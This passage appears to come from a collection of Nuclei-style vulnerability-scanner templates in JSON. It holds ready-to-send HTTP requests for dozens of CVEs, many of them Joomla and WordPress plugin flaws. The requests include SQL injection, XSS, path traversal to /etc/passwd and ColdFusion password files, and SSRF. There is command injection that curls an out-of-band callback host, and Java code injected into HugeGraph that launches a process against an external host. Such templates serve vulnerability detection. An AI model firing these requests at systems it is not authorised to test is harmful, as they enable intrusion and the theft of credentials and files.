HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n"],"payloads":{"paths":["core/auth/login/?next=//oast.me","auth/login/?next=//oast.me","login/?next=//oast.me"]},"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2024-29972","info":{"name":"Zyxel NAS326 Firmware < V5.21(AAZF.17)C0 - NsaRescueAngel Backdoor Account","severity":"critical"},"requests":[{"raw":["GET /desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, 'result=0')"],"condition":"and"}]}]},{"id":"CVE-2024-29895","info":{"name":"Cacti cmd_realtime.php - Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23917","info":{"name":"JetBrains TeamCity > 2023.11.3 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,\"<token name=\\\"{{randstr}}\\\"\")"],"condition":"and","internal":true}],"extractors":[{"type":"regex","part":"body","name":"authtoken","internal":true,"group":1,"regex":["value=\"(.+)\""]}]},{"method":"GET","path":["{{BaseURL}}/app/rest/server"],"headers":{"Authorization":"Bearer {{authtoken}}"},"extractors":[{"type":"dsl","dsl":["\"Token:\" + authtoken"]}],"matchers":[{"type":"dsl","dsl":["status_code==200","contains(content_type,'application/xml')","contains(body,'<projects href=')"],"condition":"and"}]}]},{"id":"CVE-2024-24112","info":{"name":"Exrick XMall - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,{{md5(num)}},0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","MySQLSyntaxErrorException"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3274","info":{"name":"D-LINK DNS-320L,DNS-320LW and DNS-327L - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /cgi-bin/info.cgi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Model=\", \"Build=\", \"Macaddr=\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-28734","info":{"name":"Coda v.2024Q1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /coda/frameset?cols=\"><frame%20src=\"javascript:alert(document.domain)\"> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frameset cols=\"\"><frame src=\"javascript:alert(document.domain)\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6781","info":{"name":"Calibre <= 7.14.0 Arbitrary File Read","severity":"high"},"requests":[{"raw":["GET /interface-data/books-init HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"book_ids","internal":true,"json":[".search_result.book_ids[0]"]}]},{"raw":["POST /cdb/cmd/export HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[\"extra_file\", {{book_ids}}, \"../../../../../etc/passwd\", \"\"]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","\"result\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-32651","info":{"name":"Change Detection - Server Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/"],"redirects":true,"max-redirects":2,"extractors":[{"type":"xpath","name":"version","internal":true,"xpath":["//*[@id=\"right-sticky\"]"]}],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","part":"body","words":["Change Detection"],"condition":"and"},{"type":"dsl","dsl":["compare_versions(version, '<= 0.45.20')"]}]}]},{"id":"CVE-2024-1021","info":{"name":"Rebuild <= 3.5.5 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/filex/read-raw?url=http://oast.me&cut=1"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"<h1> Interactsh Server </h1>\")","!contains(body_1, \"<h1> Interactsh Server </h1>\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-36412","info":{"name":"SuiteCRM - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /index.php?entryPoint=responseEntryPoint&event=1&delegate=a<\"+UNION+SELECT+SLEEP(6);--+-&type=c&response=accept HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains_any(body, \"You have already responded to the invitation or there\", \"Thank you for accepting\")"],"condition":"and"}]}]},{"id":"CVE-2024-4040","info":{"name":"CrushFTP VFS - Sandbox Escape LFR","severity":"critical"},"requests":[{"id":"unauth-exploit","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["root:x:"]},{"type":"word","part":"header","words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_1","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"login","raw":["GET /WebInterface/ HTTP/1.1\nHost: {{Hostname}}\n","POST /WebInterface/function/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 111\nOrigin: {{RootURL}}\nReferer: http://{{RootURL}}/WebInterface/login.html\n\ncommand=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","internal":true,"words":["<response>success</response>"]},{"type":"word","part":"header_2","internal":true,"words":["text/xml"]}],"extractors":[{"type":"regex","name":"auth","internal":true,"part":"header_2","group":1,"regex":["currentAuth=([0-9a-zA-Z]+)"]}]},{"id":"auth-exploit","raw":["POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["root:x:"]}]}]},{"id":"CVE-2024-27348","info":{"name":"Apache HugeGraph-Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /gremlin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"gremlin\": \"Thread thread = Thread.currentThread();Class clz = Class.forName(\\\"java.lang.Thread\\\");java.lang.reflect.Field field = clz.getDeclaredField(\\\"name\\\");field.setAccessible(true);field.set(thread, \\\"SL7\\\");Class processBuilderClass = Class.forName(\\\"java.lang.ProcessBuilder\\\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList(\\\"ping\\\", \\\"{{interactsh-url}}\\\");Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\\\"start\\\");startMethod.invoke(processBuilderInstance);\", \"bindings\": {}, \"language\": \"gremlin-groovy\", \"aliases\": {}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")","contains(header, \"application/json\")","contains(body, \"inputStream\\\":\")"],"condition":"and"}]}]},{"id":"CVE-2024-36837","info":{"name":"CRMEB v.5.2.2 - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/products?limit=20&priceOrder=&salesOrder=&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5({{num}})))),0x7e),3550)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}","SQLSTATE"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6911","info":{"name":"PerkinElmer ProcessPlus <= 1.11.6507.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /ProcessPlus HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"<title>Process Plus - Perten Instruments</title>\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /ProcessPlus/Log/Download/?filename=..\\..\\..\\..\\..\\..\\Windows\\win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type, \"text/plain\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-33724","info":{"name":"SOPlanning 1.52.00 Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /process/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin={{username}}&password={{password}}\n","GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"attack":"pitchfork","payloads":{"username":["admin"],"password":["admin"]},"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains_all(body_2, \"<script>alert(document.domain)</script>\", \"SOPlanning\")"],"condition":"and"}]}]},{"id":"CVE-2024-25600","info":{"name":"Unauthenticated Remote Code Execution \u2013 Bricks <= 1.9.6","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-json/bricks/v1/render_element HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"postId\": \"1\",\n  \"nonce\": \"{{nonce}}\",\n  \"element\": {\n    \"name\": \"container\",\n    \"settings\": {\n      \"hasLoop\": \"true\",\n      \"query\": {\n        \"useQueryEditor\": true,\n        \"queryEditor\": \"ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);\",\n        \"objectType\": \"post\"\n      }\n    }\n  }\n}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["Exception:","uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["nonce\":\"([0-9a-z]+)"],"internal":true}]}]},{"id":"CVE-2024-2340","info":{"name":"Avada < 7.11.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/fusion-forms/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<title>Index of [\\s\\S]*title>","fusion"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-1208","info":{"name":"LearnDash LMS < 4.10.3 - Sensitive Information Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/sfwd-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"question_type\":","\"points_total\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-31851","info":{"name":"CData Sync < 23.4.8843 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData - Sync"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-4434","info":{"name":"LearnPress WordPress LMS Plugin <= 4.2.6.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout 20s\nPOST /wp-json/lp/v1/courses/archive-course?term_id={{num}})+OR+SLEEP(6)+--+A HTTP/1.1\nHost: {{Hostname}}\nX-WP-Nonce: {{nonce}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2 >= 6","status_code_2 == 200","contains(content_type,\"application/json\")","contains_all(body_2,\"No courses were found\",\"success\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","part":"body","group":1,"regex":["\"nonce\":\"([a-z0-9]+)\",\"is_course_archive\""],"internal":true}]}]},{"id":"CVE-2024-5420","info":{"name":"SEH utnserver Pro/ProMAX/INU-100 20.1.22 - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["POST /device/description_en.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=set&sys_name=%E2%80%9C%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sys_descr=&sys_contact=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\u201c><script>alert(document.domain)</script>\" id=\"standort\"","Host name</label>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6396","info":{"name":"Aimhubio Aim Server 3.19.3 - Arbitrary File Overwrite","severity":"critical"},"requests":[{"raw":["POST /tracking/client_1/get-resource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"resource_type\": \"Repo\",\n\"args\": \"AAAAAAABAAAABw==\"\n}\n","POST /tracking/client_1/read-instruction HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"resource_handler\": \"my_resource\",\n\"method_name\": \"_backup_run\",\n\"args\": \"{{base64(args)}}\"\n}\n","@Host: http://{{Host}}:43800\nGET /static-files/{{filename}}.txt HTTP/1.1\nHost: {{Host}}:43800\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{\"handler\":\"my_resource\"}"]},{"type":"word","part":"body_3","words":["{{filename}}.txt"]},{"type":"word","part":"header_3","words":["text/plain"]}]}]},{"id":"CVE-2024-6159","info":{"name":"Push Notification for Post and BuddyPress <= 1.93 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/push-notification-for-post-and-buddypress\")"],"internal":true}]},{"raw":["@timeout 50s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=icpushcallback&onesignal_externalid=1+AND+SLEEP(6)&pushtype=onesignal_subscribed_users\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","contains(content_type,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-6922","info":{"name":"Automation Anywhere Automation 360 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /v1/proxy/test HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"saasUrl\":\"{{interactsh-url}}/?param=one#\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"message\":"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2010-1870","info":{"name":"ListSERV Maestro <= 9.0-8 RCE","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lui/","{{BaseURL}}/hub/"],"extractors":[{"type":"regex","regex":["LISTSERV Maestro\\s+9\\.0-[123456780]","LISTSERV Maestro\\s+[5678]","Administration Hub 9\\.0-[123456780]","Administration Hub [5678]"]}]}]},{"id":"CVE-2010-0985","info":{"name":"Joomla! Component com_abbrev - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1475","info":{"name":"Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4719","info":{"name":"Joomla! Component JRadio - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2034","info":{"name":"Joomla! Component Percha Image Attach 1.1 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0982","info":{"name":"Joomla! Component com_cartweberp - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5028","info":{"name":"Joomla! Component JE Job 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2918","info":{"name":"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1461","info":{"name":"Joomla! Component Photo Battle 1.0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1982","info":{"name":"Joomla! Component JA Voice 2.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2682","info":{"name":"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-5286","info":{"name":"Joomla! Component Jstore - 'Controller' Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2045","info":{"name":"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0759","info":{"name":"Joomla! Plugin Core Design Scriptegrator - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1719","info":{"name":"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-3426","info":{"name":"Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1531","info":{"name":"Joomla! Component redSHOP 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1534","info":{"name":"Joomla! Component Shoutbox Pro - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1217","info":{"name":"Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1601","info":{"name":"Joomla! Component JA Comment - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0944","info":{"name":"Joomla! Component com_jcollection - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1315","info":{"name":"Joomla! Component webERPcustomer - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1977","info":{"name":"Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1878","info":{"name":"Joomla! Component OrgChart 1.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1081","info":{"name":"Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1306","info":{"name":"Joomla! Component Picasa 2.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2128","info":{"name":"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0157","info":{"name":"Joomla! Component com_biblestudy - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1352","info":{"name":"Joomla! Component Juke Box 1.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1302","info":{"name":"Joomla! Component DW Graph - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2861","info":{"name":"Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rdspassword=","encrypted="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1354","info":{"name":"Joomla! Component VJDEO 1.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1532","info":{"name":"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1954","info":{"name":"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-4617","info":{"name":"Joomla! Component JotLoader 2.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1979","info":{"name":"Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-0972","info":{"name":"Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-2033","info":{"name":"Joomla! Percha Categories Tree 0.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2010-1307","info":{"name":"Joomla! Component Magic Updater - Local File 